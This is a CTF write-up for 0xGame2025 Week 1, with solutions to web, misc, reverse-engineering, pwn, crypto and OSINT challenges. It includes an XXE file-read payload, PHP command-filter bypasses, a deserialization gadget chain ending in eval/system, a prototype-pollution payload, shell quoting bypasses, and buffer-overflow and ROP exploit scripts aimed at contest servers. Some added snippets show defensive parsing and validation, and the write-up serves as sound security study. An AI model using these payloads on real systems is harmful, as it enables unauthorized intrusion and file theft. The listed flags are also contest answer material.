0xGame2025 Week1 full write-up (Web+Misc+Reverse+Pwn+Crypto+Osint)
Web
Lemon
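Teens in Times, we like you
Right-click and F12 are disabled.
In practice, holding F12 down still forces the developer tools open, or you can use the shortcut
Ctrl+U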

The truth of HTTP, I have figured it out

Modify the request according to the challenge hints

    POST /?hello=web HTTP/1.1
    Host: 80-42e509c2-93bd-4e6a-9963-f2a827a573d0.challenge.ctfplus.cn
    Content-Length: 9
    Cache-Control: max-age=0
    Origin: http://80-42e509c2-93bd-4e6a-9963-f2a827a573d0.challenge.ctfplus.cn
    Content-Type: application/x-www-form-urlencoded
    Upgrade-Insecure-Requests: 1
    User-Agent: Safari
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: www.mihoyo.com
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: Sean=god
    Connection: keep-alive
    Via:clash

    http=good

Message Board (Pink)
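The login page accepts a weak password, so log in directly (admin/admin123)

Normal input returns an XML error, so go straight for XXE (the classic payload)

    <?xml version="1.0"?>
    <!DOCTYPE a [
    <!ENTITY xxe SYSTEM "file:///flag">
    ]>
    <msg>&xxe;</msg>

<?xml version="1.0"?> is the XML declaration; it marks this as an XML 1.0 document.
<!DOCTYPE a [ starts the document type definition (DTD); it declares the document type as a and opens the internal DTD subset.
<!ENTITY xxe SYSTEM "file:///flag"> defines an entity named xxe that tells the XML parser to read the file /flag from the server's file system.
<msg>&xxe;</msg> references the entity xxe defined above. If the XML parser is misconfigured and allowed to process external entities, it replaces &xxe; with the content it read from file:///flag.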
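The defensive counterpart to the payload above, as an added example that is not part of the challenge or of the original write-up: a parser front end that refuses any document carrying a DOCTYPE or an entity declaration before the message is processed. The function names and the sample messages are assumptions made for the illustration.

```python
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """The document declares a DTD or an entity, which a message board never needs."""


def read_msg(xml_text: str) -> str:
    """Return the text of the <msg> element, refusing any DTD or entity declaration."""
    parser = xml.parsers.expat.ParserCreate()
    text, depth_in_msg = [], 0

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML(f"DOCTYPE {name!r} rejected")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML(f"entity declaration {name!r} rejected")

    def forbid_external_ref(context, base, sysid, pubid):
        raise ForbiddenXML(f"external entity {sysid!r} rejected")

    def start(tag, attrs):
        nonlocal depth_in_msg
        if tag == "msg" or depth_in_msg:
            depth_in_msg += 1

    def end(tag):
        nonlocal depth_in_msg
        if depth_in_msg:
            depth_in_msg -= 1

    def chars(data):
        if depth_in_msg:
            text.append(data)

    # The three "forbid" handlers fire before any entity could be expanded.
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external_ref
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_text, True)
    return "".join(text)


def is_rejected(xml_text: str) -> bool:
    """True when read_msg refuses the document because of a DTD or entity."""
    try:
        read_msg(xml_text)
    except ForbiddenXML:
        return True
    return False


# Constructed inputs: an ordinary message and the payload shown in this section.
BENIGN = "<msg>hello &amp; bye</msg>"
XXE_SAMPLE = ('<?xml version="1.0"?><!DOCTYPE a [<!ENTITY xxe SYSTEM '
              '"file:///flag">]><msg>&xxe;</msg>')

if __name__ == "__main__":
    print(read_msg(BENIGN), is_rejected(XXE_SAMPLE))
```

The predefined entities such as &amp; still work because they need no declaration; only documents that bring their own DTD are refused.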
RCE1

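MD5 check; all of these command words are filtered: system|cat|flag|ls|echo|nl|rev|more|grep|cd|cp|vi|passthru|shell|vim|sort|strings, and also *
A plain cat /flag cannot be used, and because * is filtered, f* cannot be used either, so:
system can be replaced with print
cat can be replaced with tac
`` (backticks) execute the command inside them
f??? matches a four-character file name starting with f
ls can be bypassed with l\s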
Payload:
http://localhost:80/index.php?rce1[]=1 rce2[]=2&rce3=print(`tac /f???`); //rce3=readfile('/'.'fl'.'ag');
Rubbish_Unser
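PHP deserialization vulnerability

Logic chain:
ZZZ::__destruct → __toString
→ Mi::__toString (triggered when the object is used as a string)
→ GI::__call() (triggered by calling the nonexistent method tks())
→ HI3rd::__invoke (triggered by calling the object as a function)
→ HSR::__get() (triggered by accessing the nonexistent property Elysia)
→ eval

The following condition must be satisfied, and there are three ways to do it:

    $this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei)

The MD5 values and the SHA1 values must each be equal.
a = 1, b = '1'
or a = 0, b = 0E1
Error class:

    $c->a=new Error("a",1);$c->b=new Error("a",2)

The final throw exception is dealt with by using PHP's garbage collection (GC) mechanism.
PHP manages objects in memory automatically with reference counting and collection cycles. When a variable is set to NULL, or nothing points to it any more, it becomes garbage and is reclaimed automatically by the GC. So here: when an object is no longer referenced, the GC reclaims it, and during reclamation its __destruct method is triggered automatically. This is the key to getting around the thrown exception.
So the EXP: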
    <?php
    error_reporting(0);

    class ZZZ {
        public $yuzuha;
        function __construct($yuzuha) {
            $this -> yuzuha = $yuzuha;
        }
        function __destruct() {
            echo "破绽,在这里!" . $this -> yuzuha;
        }
    }

    class HSR {
        public $robin="system('env');";
        function __get($robin) {
            echo "4";
            $castorice = $this -> robin;
            eval($castorice);
        }
    }

    class HI3rd {
        public $RaidenMei;
        public $kiana;
        public $guanxing;
        function __invoke() {
            echo "3";
            if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei))
                return $this -> guanxing -> Elysia;
        }
    }

    class GI {
        public $furina;
        function __call($arg1, $arg2) {
            echo "2";
            $Charlotte = $this -> furina;
            return $Charlotte();
        }
    }

    class Mi {
        public $game;
        function __toString() {
            echo "1";
            $game1 = @$this -> game -> tks();
            return $game1;
        }
    }

    $a=new ZZZ(1);
    $a-> yuzuha=new Mi();
    $a-> yuzuha->game=new GI();
    $a-> yuzuha->game->furina=new HI3rd();
    $a-> yuzuha->game->furina->kiana=new Exception("",1);$a-> yuzuha->game->furina->RaidenMei=new Exception("",2);
    $a-> yuzuha->game->furina->guanxing=new HSR();
    echo urlencode(serialize($a));
    ?>
Lemon_RevEnge
Prototype chain pollution
{ "__init__":{"__globals__":{"os":{"path":{"pardir":","}}}}}

Message Board_reVenge
/xxxxmleee.php
Same as Message Board (Pink): go straight for XXE, no bypass needed


Misc
Sign_in
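Base64 decode, then a second decoding step with Caesar


Official account original draft
A zip file hidden with steganography

Extract it, open it in VS Code, and use the Ctrl+Shift+F shortcut to search for the flag

Zootopia
The 随波逐流 tool solves it instantly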


Sign-in - 0xGame
0xGame{🎉👋🕹️2️⃣0️⃣2️⃣5️⃣0️⃣❎🎮🎯🏟️🥳🎊⚽😄}
Do not enter
    ~$ sudo losetup -fP do_not_enter.dd
    ~$ sudo losetup -a
    /dev/loop0: [2096]:536444 (/home/yolo/Desktop/timu/0xGame_challenge/do_not_enter.dd)
    ~$ lsblk -f /dev/loop0
    NAME      FSTYPE FSVER LABEL        UUID                                 FSAVAIL FSUSE% MOUNTPOINTS
    loop0
    ├─loop0p1 ext4   1.0   UserShare    5a6be8f0-43f9-4020-a729-510d6d57e95b
    ├─loop0p2 ext4   1.0   Do_not_enter 643298ec-2a07-4681-9555-addf90de8ae1
    ├─loop0p3
    ├─loop0p5 ext4   1.0   WebServer    f965eed6-3de2-4533-8e06-2c816f9e4574
    └─loop0p6 ext4   1.0   SysLogs      650ce632-c57e-41c6-8a3b-c6bf3d4e2193
    ~$ sudo mount /dev/loop0p2 /mnt/test
    ~$ sudo grep -r "0xGame" /mnt/test
    /mnt/test/syslog:0xGame{WoW_y0u_fouNd_1t?_114514}
    ~$ sudo umount /mnt/test
    ~$ sudo losetup -d /dev/loop0
    ~$ sudo rmdir /mnt/test

ez_Shell
Construct the flag following the hints in the official write-up


0xGame{hacker/home/hacker.mysecret_It_is_funny_right?_You_hacked_me!!!}
ezShell_PLUS
Follow the challenge description
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~$ ls
    challenge
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~$ cd challenge
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ ls
    decrypt.sh files hash_value
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ cat hash_value
    9e4bba0f1d59dbb430078a54ad9eda3c2d7f1b3cab323cf2041e61e897fd0840
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ cd files
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge/files$ ls
    (output omitted: a long listing of .dat files with random hexadecimal names)
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge/files$ sha256sum *.dat | grep 9e4bba0f1d59dbb430078a54ad9eda3c2d7f1b3cab323cf2041e61e897fd0840
    9e4bba0f1d59dbb430078a54ad9eda3c2d7f1b3cab323cf2041e61e897fd0840 f9a0df0bab59793e.dat
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge/files$ ./decrypt.sh files/f9a0df0bab59793e.dat
    -bash: ./decrypt.sh: No such file or directory
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge/files$ cd ../
    welcome@dep-f031579f-3f98-40cc-acc1-c7fa6cdac464-6c66ccb687-ch48r:~/challenge$ ./decrypt.sh files/f9a0df0bab59793e.dat
    0xGame{Welc0me_to_H@ckers_w0r1d}

Reverse
Signln
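Method 1
Open the file and the flag is visible

Method 2

Right-click, search for a matching pattern, and enter 0xGame

Signln2
Run it to get the hint


EasyXor
Open it in DIE to check the file type

It is ELF64, so load it straight into IDA

Double-click the str() function, or just hand it to an AI for analysis

In IDA 9.2.7 you can right-click and dump the data directly; my version is older, so I used the script from the official write-up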
    enc=[0x42,0x1A,0x39,0x17,0x1D,0x9,0x51,0x55,0x2C,0x5F,0x63,0xC,0xD,0x16,0x62,0x27,0x55,0x64,0x55,0x26,0x6D,0x6A,0x18,0x34,0x88,0x65,0x6E,0x1C,0x21,0x6E,0x3D,0x23,
         0x6A,0x25,0x6B,0x63,0x68,0x7E,0x77,0x75,0x9A,0x7D,0x39,0x43]
    key = 'raputa0xGame2025'
    for i in range(len(enc)):
        print(chr((enc[i]-i)^ord(key[i % len(key)])),end='')
BaseUpx
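DIE shows a standard UPX packer

Unpack it with upx

Open it in IDA and look at the puts function

Decrypt to get the flag

DyDebug
Set a breakpoint at Pity and run; any random input yields the flag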


ZZZ

This challenge tests solving with z3
Reproduce the equations in z3
pip install z3-solver
    from z3 import *
    import hashlib

    sha256='4aba519d4666f5421488afaaf89efdcbe48e7a53f814ce5c1d82b46b55032651'
    s=Solver()
    x1=BitVec('x1',32)
    x2=BitVec('x2',32)
    x3=BitVec('x3',32)
    x4=BitVec('x4',32)
    s.add(3 * x2 + 5 * x1 + 7 * x4 + 2 * x3 == -1445932505)
    s.add(2 * (2 * (2 * x2 + x3) + x1) + x4 == -672666814)
    s.add(7 * x2 + 3 * x1 + 5 * x4 + 4 * x3 == 958464147)
    s.add(((x1 ^ x2) << 6) + ((x3 >> 6) ^ 0x4514) == 123074281)
    while s.check() == sat:
        model=s.model()
        x1_val=model[x1].as_long()
        x2_val=model[x2].as_long()
        x3_val=model[x3].as_long()
        x4_val=model[x4].as_long()
        flag=f"0xGame{{{x1_val:08x}{x2_val:08x}{x3_val:08x}{x4_val:08x}}}"
        if hashlib.sha256(flag.encode()).hexdigest()==sha256:  # check whether this is the correct flag
            print(flag)
        exception=Or(x1!=x1_val,x2!=x2_val,x3!=x3_val,x4!=x4_val)  # exclude the solution just found
        s.add(exception)

Pwn
Command execution🤔
Insert harmless separators into an otherwise normal command, for example: ca\t flag; c'a't flag
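Why a word filter on the raw input misses these forms and what a stricter check looks like, as an added example that is not part of the challenge or of the original write-up. The challenge's real filter is not shown on this page, so naive_filter is an assumed stand-in, and the allowlist contents are hypothetical.

```python
import shlex

# Words the challenge banner says are blocked ("no cat no sh").
DENYLIST = ("cat", "sh")
# Hypothetical allowlist for a service that only needs these programs.
ALLOWED_PROGRAMS = {"ls", "id", "date"}
# Characters that let the shell rewrite, expand or chain what was typed.
SHELL_META = set("\\'\"`$;|&<>(){}[]*?~!#\n")


def naive_filter(cmd: str) -> bool:
    """Assumed challenge-style check: substring match on the raw input."""
    return not any(word in cmd for word in DENYLIST)


def normalized_filter(cmd: str) -> bool:
    """Denylist applied after shell-style unquoting of every word."""
    try:
        argv = shlex.split(cmd, posix=True)
    except ValueError:              # unbalanced quotes: refuse
        return False
    return bool(argv) and not any(w in arg for arg in argv for w in DENYLIST)


def allowlist_filter(cmd: str) -> bool:
    """Accept only known programs and no shell metacharacters at all."""
    if any(ch in SHELL_META for ch in cmd):
        return False
    argv = cmd.split()
    return bool(argv) and argv[0] in ALLOWED_PROGRAMS


def run_demo():
    """Return (naive, normalized, allowlist) verdicts for constructed inputs."""
    samples = ["cat flag", r"ca\t flag", "c'a't flag", "ls -l"]
    return {s: (naive_filter(s), normalized_filter(s), allowlist_filter(s))
            for s in samples}


if __name__ == "__main__":
    for cmd, verdicts in run_demo().items():
        print(f"{cmd!r:16} accepted by naive/normalized/allowlist: {verdicts}")
```

Normalizing first closes the quoting and backslash gap, but a denylist still depends on enumerating every dangerous word; the allowlist variant does not.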
    wenyifan@wenyifan-VMware-Virtual-Platform:~/Desktop$ nc nc1.ctfplus.cn 26950
    Please input your command,no cat no sh!
    ca\t flag
    0xGame{y0u_c4n_4ls0_3x3cu73_c0mm4nd_w17h0u7_5h_4nd_c47}

test_your_nc

stack overflow
A very simple stack overflow


    from pwn import *

    w=remote("nc1.ctfplus.cn",20513)
    #io=process('./pwn')
    # 0x38 filler bytes followed by the 64-bit address 0x4011F7
    payload=b'a'*0x38+p64(0x4011F7)
    w.send(payload)
    w.interactive()

Simple math problem
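    from pwn import *

    context.log_level='debug'
    #io=process('./pwn')
    io=remote("nc1.ctfplus.cn",16627)
    io.recvuntil(b"Kore wa shiren da!\n")
    for i in range(1000):
        # read one question up to "?" and drop the last three bytes
        t=io.recvuntil(b"?")[:-3]
        if b"x" in t:
            # the server writes multiplication as "x"; turn it into "*"
            t=t.decode()
            t = t.replace("x", "*", 1)
            t=t.encode()
        # eval() runs whatever the server sent, so this is only for a CTF endpoint
        num=eval(t)
        io.sendline(str(num).encode())
        io.recvline()
        io.recvline()
    io.interactive()

ROP1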



    from pwn import *

    #io=process('./pwn')
    io=remote("nc1.ctfplus.cn",26572)
    system=p64(0x401195)
    sh=p64(0x000000000040201e)
    rdi=p64(0x000000000040117e)
    payload=b'a'*0x28+rdi+sh+system
    io.send(payload)
    io.interactive()

ROP2



    from pwn import *

    #io=process('./pwn')
    io=remote("nc1.ctfplus.cn",49374)
    payload=b'a'*0x38+p64(0x40119E)+p64(0x401200+2)+p64(0x40122B)
    #gdb.attach(io)
    io.sendline(payload)
    io.interactive()

Crypto
2FA
oathtool --totp -b FZUA6MCDB6YHVZVZCXK4C47ERRG363MR
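CyberChef (left): its purpose is general-purpose data encoding/decoding, encryption/decryption and similar operations. The module used here is "From Base32", which decodes a Base32 string back into the original bytes.
oathtool --totp -b (right): its purpose is to generate a TOTP (Time-based One-Time Password). The -b option tells it that the argument (LLEKTHRI4AKSWAMG4EYGFEQT4T4U5D7P) is a Base32-encoded key. oathtool first decodes this Base32 key into raw bytes, then uses those bytes as the seed together with the current timestamp to compute the TOTP, and finally outputs a 6-digit or 8-digit number.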

芸翎
    import string
    import hashlib
    from pwn import *
    from Crypto.Util.number import *
    import itertools
    import re


    def solve_pow(prefix_end, target_hash):
        """
        Brute-force the 4-character prefix of the proof of work
        """
        alphabet = string.ascii_letters + string.digits
        for x in itertools.product(alphabet, repeat=4):
            x_str = ''.join(x)
            s = x_str + prefix_end
            if hashlib.sha256(s.encode()).hexdigest() == target_hash:
                return x_str
        return None


    def decrypt_rsa_prime_n(n, e, c_hex):
        """
        RSA decryption when n is prime
        """
        # convert the hex ciphertext to an integer (little-endian)
        c_bytes = bytes.fromhex(c_hex)
        c_int = int.from_bytes(c_bytes, 'little')
        # phi(n) = n - 1
        phi = n - 1
        # check gcd(e, phi)
        g = GCD(e, phi)
        print(f"[*] gcd(e, phi) = {g}")
        if g != 1:
            print("[!] e and phi are not coprime, cannot decrypt directly")
            return None
        # compute the private key d
        d = pow(e, -1, phi)
        # decrypt
        m = pow(c_int, d, n)
        return m


    def extract_flag(m_bytes):
        """
        Extract the flag from the decrypted bytes
        """
        # Method 1: try UTF-8 decoding
        try:
            flag_str = m_bytes.decode('utf-8')
            if '}' in flag_str:
                end_index = flag_str.index('}') + 1
                return flag_str[:end_index]
            return flag_str
        except:
            pass
        # Method 2: look for a flag-style string
        if b'flag' in m_bytes or b'0xGame' in m_bytes or b'CTF' in m_bytes:
            flag_bytes = b''
            for byte in m_bytes:
                if 32 <= byte <= 126:
                    flag_bytes += bytes([byte])
                else:
                    break
            return flag_bytes.decode('ascii', errors='ignore')
        # Method 3: return a raw preview
        return m_bytes[:100]


    def main():
        try:
            print("[*] Connecting to server...")
            r = remote('nc1.ctfplus.cn', 14612)
            # --- PoW ---
            line = r.recvline().decode().strip()
            print(f"[*] Received: {line}")
            match = re.match(r'\[\+\] sha256\(XXXX\+([a-zA-Z0-9]+)\) == ([0-9a-f]+)', line)
            if not match:
                print("[!] Failed to parse PoW challenge")
                return
            suffix = match.group(1)
            target_hash = match.group(2)
            print(f"[*] Solving POW: suffix={suffix}, target_hash={target_hash}")
            xxxx = solve_pow(suffix, target_hash)
            if xxxx is None:
                print("[!] POW failed")
                return
            print(f"[+] POW solved: {xxxx}")
            r.sendlineafter(b'[-] Give me XXXX:', xxxx.encode())
            # --- receive the RSA parameters ---
            r.recvuntil(b'[+] n = ')
            n = int(r.recvline().strip())
            r.recvuntil(b'[+] e = ')
            e = int(r.recvline().strip())
            r.recvuntil(b'[+] c = ')
            c_hex = r.recvline().strip().decode()
            print(f"[*] n bits = {n.bit_length()}")
            print(f"[*] e = {e}")
            print(f"[*] c_hex length = {len(c_hex)}")
            # --- decrypt ---
            m = decrypt_rsa_prime_n(n, e, c_hex)
            if m is None:
                return
            m_bytes = long_to_bytes(m)
            print(f"[*] Decrypted message length: {len(m_bytes)} bytes")
            # --- extract the flag ---
            flag = extract_flag(m_bytes)
            print(f"\n[+] FLAG: {flag}\n")
            # for debugging: first and last 50 bytes
            print(f"[*] First 50 bytes: {m_bytes[:50]}")
            print(f"[*] Last 50 bytes: {m_bytes[-50:]}")
        except Exception as e:
            print(f"[!] Error: {e}")
        finally:
            try:
                r.close()
            except:
                pass


    if __name__ == '__main__':
        main()

Diffie-Hellman
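The solve script in this section submits 1 as Bob's public key, so the shared secret is 1 for any server private key and the AES key is sha256(long_to_bytes(1)). As an added example (not the challenge's code and not from the original write-up), the public-key validation that closes this hole, shown on a toy safe-prime group; P, Q, G and all function names are constructed for the illustration.

```python
import hashlib

# Toy safe-prime group, constructed for this example only: P = 2*Q + 1, both prime.
# G = 4 generates the subgroup of prime order Q. Real groups are 2048 bits or more.
P, Q, G = 2039, 1019, 4


class BadPublicKey(ValueError):
    """The peer's public value would make the shared secret predictable."""


def int_to_bytes(n: int) -> bytes:
    """Big-endian bytes without leading zeros (what long_to_bytes gives for n > 0)."""
    return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")


def derive_key(shared: int) -> bytes:
    """Key derivation used by the solve script in this section: SHA-256 of the secret."""
    return hashlib.sha256(int_to_bytes(shared)).digest()


def shared_unchecked(priv: int, peer_pub: int) -> int:
    """What a server without validation computes: peer_pub ** priv mod P."""
    return pow(peer_pub, priv, P)


def validate_public(pub: int) -> int:
    """Reject 0, 1, P-1, out-of-range values and anything outside the order-Q subgroup."""
    if not 2 <= pub <= P - 2:
        raise BadPublicKey("public value out of range")
    if pow(pub, Q, P) != 1:
        raise BadPublicKey("public value not in the prime-order subgroup")
    return pub


def shared_checked(priv: int, peer_pub: int) -> int:
    """Validated key agreement."""
    return pow(validate_public(peer_pub), priv, P)


def is_rejected(pub: int) -> bool:
    """True when validate_public refuses the value."""
    try:
        validate_public(pub)
    except BadPublicKey:
        return True
    return False


if __name__ == "__main__":
    # With B = 1 the secret is 1 whatever the private key is.
    print([shared_unchecked(a, 1) for a in (5, 123, 1000)])
    print([(b, is_rejected(b)) for b in (0, 1, P - 1, P - 2, pow(G, 456, P))])
```

The range check alone stops the B = 1 case used here; the subgroup check additionally stops values such as P-2 that would confine the secret to a small set.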
    #!/usr/bin/env python3
    # exploit_dh_flag.py
    # Usage: python3 exploit_dh_flag.py
    import socket
    import re
    from hashlib import sha256
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import unpad
    from Crypto.Util.number import long_to_bytes

    HOST = "nc1.ctfplus.cn"
    PORT = 49871


    def recv_all_until(sock, marker, timeout=5):
        sock.settimeout(timeout)
        data = b""
        while True:
            try:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                data += chunk
                if marker in data:
                    break
            except socket.timeout:
                break
        return data


    def main():
        with socket.create_connection((HOST, PORT), timeout=10) as s:
            # read initial banner until prompt for Bob's Public Key
            data = recv_all_until(s, b"Bob's Public Key:")
            text = data.decode(errors='ignore')
            print("[+] Server banner:")
            print(text)
            # send B = 1
            s.sendall(b"1\n")
            print("[+] Sent Bob's public key = 1")
            # receive remaining output (encrypted flag)
            more = recv_all_until(s, b"\n", timeout=2)
            data2 = data + more
            text2 = data2.decode(errors='ignore')
            # try to find the hex after "Encrypted Flag:"
            m = re.search(r"Encrypted Flag:\s*([0-9a-fA-F]+)", text2)
            if not m:
                # maybe server closed and printed later; try reading more
                try:
                    extra = s.recv(8192)
                    text2 += extra.decode(errors='ignore')
                    m = re.search(r"Encrypted Flag:\s*([0-9a-fA-F]+)", text2)
                except:
                    pass
            if not m:
                print("[-] Couldn't find 'Encrypted Flag' in server response. Full response:")
                print(text2)
                return
            hex_cipher = m.group(1)
            print("[+] Encrypted Flag (hex):", hex_cipher)
            ct = bytes.fromhex(hex_cipher)
            # reproduce key: s = 1 -> long_to_bytes(1)
            key = sha256(long_to_bytes(1)).digest()
            cipher = AES.new(key, AES.MODE_ECB)
            try:
                pt = unpad(cipher.decrypt(ct), 16)
            except ValueError as e:
                print("[-] Unpad/Decrypt error:", e)
                # still try without unpad
                pt = cipher.decrypt(ct)
            print("\n[+] Decrypted flag (raw bytes):", pt)
            try:
                print("[+] Flag (utf-8):", pt.decode())
            except:
                print("[+] Flag (repr):", repr(pt))


    if __name__ == "__main__":
        main()

ez_RSA
    from Crypto.Util.number import *
    from secret import flag

    p, q = [getPrime(256) for _ in range(2)]
    n = p * q
    e = 65537
    m = bytes_to_long(flag)
    c = pow(m, e, n)
    print(f"n = {n}")
    print(f"c = {c}")
    # n = 5288062996177288067805240670327919739339874127477405321607402348589147491552053048231920112750216696782518281218048178087877077018108705271341382858124037
    # c = 2454797328903978848197140611862882439826920912955785083080835692389929572917351093371626343669582289242212514789420568997224614087740388703381025018563979

Factor n to obtain p and q, compute d, then compute m, and finally convert m to a string

    p=60979507724530093051797511853954365018147917052474373616663462193464369184711
    q=86718689499194998339746379891242621495538434539975542252458947218776577824467

Decryption script

    # -*- coding: utf-8 -*-
    from Crypto.Util.number import long_to_bytes, inverse

    # known parameters
    n = 5288062996177288067805240670327919739339874127477405321607402348589147491552053048231920112750216696782518281218048178087877077018108705271341382858124037
    c = 2454797328903978848197140611862882439826920912955785083080835692389929572917351093371626343669582289242212514789420568997224614087740388703381025018563979
    p = 60979507724530093051797511853954365018147917052474373616663462193464369184711
    q = 86718689499194998339746379891242621495538434539975542252458947218776577824467
    e = 65537

    # ------------------- RSA private key recovery -------------------
    # check that n = p * q
    assert n == p * q, "p * q 不等于给出的 n!"
    # compute φ(n) = (p-1)*(q-1)
    phi = (p - 1) * (q - 1)
    # compute the private key d = e^{-1} mod φ(n)
    d = inverse(e, phi)

    # ------------------- decryption -------------------
    # m = c^d mod n
    m = pow(c, d, n)
    # convert the integer back to bytes → flag
    flag = long_to_bytes(m)
    print("flag =", flag.decode())  # assumes the flag is a printable ASCII string

Vigenere
    from string import digits, ascii_letters, punctuation

    ciphertext = 'WL"mKAaequ{q_aY$oz8`wBqLAF_{cku|eYAczt!pmoqAh+'
    key = "Welcome-2025-0xGame"
    alphabet = digits + ascii_letters + punctuation


    def vigenere_decrypt(cipher, key):
        plaintext = ''
        key_index = 0
        for char in cipher:
            # subtract the key character's index from the ciphertext character's index
            bias = alphabet.index(key[key_index])
            char_index = alphabet.index(char)
            new_index = (char_index - bias) % len(alphabet)
            plaintext += alphabet[new_index]
            key_index = (key_index + 1) % len(key)
        return plaintext


    flag = vigenere_decrypt(ciphertext, key)
    print(flag)

笙莲
    #!/usr/bin/env python3
    # Final version: decode automatically and cut off the random bytes, printing only the real flag
    from base64 import b64decode

    # ======= Paste the four lines printed by the challenge here (no b'' needed) =======
    c0 = "MHhHYW1le7u2063AtLW9MHhHYW1lMjAyNQ=="
    c1 = "a3accfd6d4dac4e3d2d1beadd1a7bbe143727970746fb5c4bb"
    c2 = "wqwwwqqaawwwaaqawqwawwwwaaawwwawaqqwwwqaqwwqwaaqwaqqaaawqqqaqaqwaaawwwqaqaaaaqawaqqqwwqqwaqwqwwwawawqqwwqqawqwaqwwawwqwaqqaqwaw"
    c3 = "5787980659359196741038715872684190805073807486263453249083702093905274294594502252203577660251756609738877887210677202141957646934092054500618364441642896304387589669635034683021946777034215355675802286923927161922717560413551789421376288823912349463080999424773600185557948875343480056576969695671340947861706467351885610345887785319870159654836532664189086047061137903149197973327299859185905186913896041309284477616128"
    # =====================================================


    # ---------- decode part ----------
    def decode_awaqaq(s: str) -> bytes:
        inv = {'a':0, 'w':1, 'q':2}
        num = 0
        for i, ch in enumerate(s):
            num += inv[ch] * (3 ** i)
        length = (num.bit_length() + 7) // 8
        return num.to_bytes(length, 'big')


    def integer_kth_root(n: int, k: int) -> int:
        lo, hi = 1, 1 << ((n.bit_length() // k) + 2)
        while lo < hi:
            mid = (lo + hi) // 2
            if mid**k <= n:
                lo = mid + 1
            else:
                hi = mid
        return lo - 1


    # decode each part
    b0 = b64decode(c0)
    b1 = bytes.fromhex(c1)
    b2 = decode_awaqaq(c2)
    # c3 = (little_int)**7
    n = int(c3)
    x = integer_kth_root(n, 7)
    seg_len = max(len(b0), len(b1), len(b2))
    b3 = x.to_bytes(seg_len, 'little')
    # combine all bytes
    all_bytes = b0 + b1 + b2 + b3

    # ---------- truncate automatically at '}' ----------
    end = all_bytes.find(b"}")
    if end == -1:
        raise ValueError("没有找到 '}',可能数据复制错误")
    flag = all_bytes[:end+1].decode("gb2312", errors="ignore")

    # ---------- print the final flag ----------
    print(flag)

Vigenere Advanced
    # solve_vigenere_adv.py
    from string import digits, ascii_letters, punctuation, ascii_lowercase
    import itertools

    alphabet = digits + ascii_letters + punctuation
    key = "QAQ(@.@)"
    ciphertext = "0l0CSoYM<c;amo_P_"  # output given by the challenge
    n = len(alphabet)
    prefix = "0xGame{"
    suffix = "}"


    def decrypt_char(c, bias):
        """Brute-force the original character; returns the list of possible plaintext characters"""
        target_index = alphabet.index(c)
        candidates = []
        for x in range(n):
            if ((x + bias) * x) % n == target_index:
                candidates.append(alphabet[x])
        return candidates


    # build the candidate characters for each position (filtered by the flag format)
    cand_lists = []
    for i, c in enumerate(ciphertext):
        bias = alphabet.index(key[i % len(key)])
        cands = decrypt_char(c, bias)
        if i < len(prefix):
            cands = [ch for ch in cands if ch == prefix[i]]
        elif i == len(ciphertext) - 1:
            cands = [ch for ch in cands if ch == suffix]
        else:
            cands = [ch for ch in cands if ch in ascii_lowercase]
        if not cands:
            raise ValueError(f"No candidates at position {i} for cipher char {c!r}")
        cand_lists.append(cands)


    # generate all combinations and verify (double check: re-encrypting must give the original ciphertext)
    def encrypt(plaintext, key):
        ct = ''
        key_index = 0
        for ch in plaintext:
            bias = alphabet.index(key[key_index])
            char_index = alphabet.index(ch)
            new_index = ((char_index + bias) * char_index) % n
            ct += alphabet[new_index]
            key_index = (key_index + 1) % len(key)
        return ct


    candidates = []
    for combo in itertools.product(*cand_lists):
        pt = ''.join(combo)
        if encrypt(pt, key) == ciphertext:
            candidates.append(pt)


    # simple ordering by "readability": prefer candidates containing the common English word 'excellent'
    def score_flag(s):
        body = s[len(prefix):-1]
        score = 0
        if "excellent" in body:
            score += 10
        # more heuristics can be added here
        return score


    candidates = sorted(candidates, key=lambda s: -score_flag(s))
    print("找到的候选 flag(按可能性排序):")
    for i, c in enumerate(candidates, 1):
        print(f"{i}. {c}")
    # if you just want the most likely one:
    if candidates:
        print("\n最可能的 flag:", candidates[0])
    else:
        print("未找到符合条件的 flag。")

Osint
Guess the background
0xGame{大室山_32.1191_118.9265}

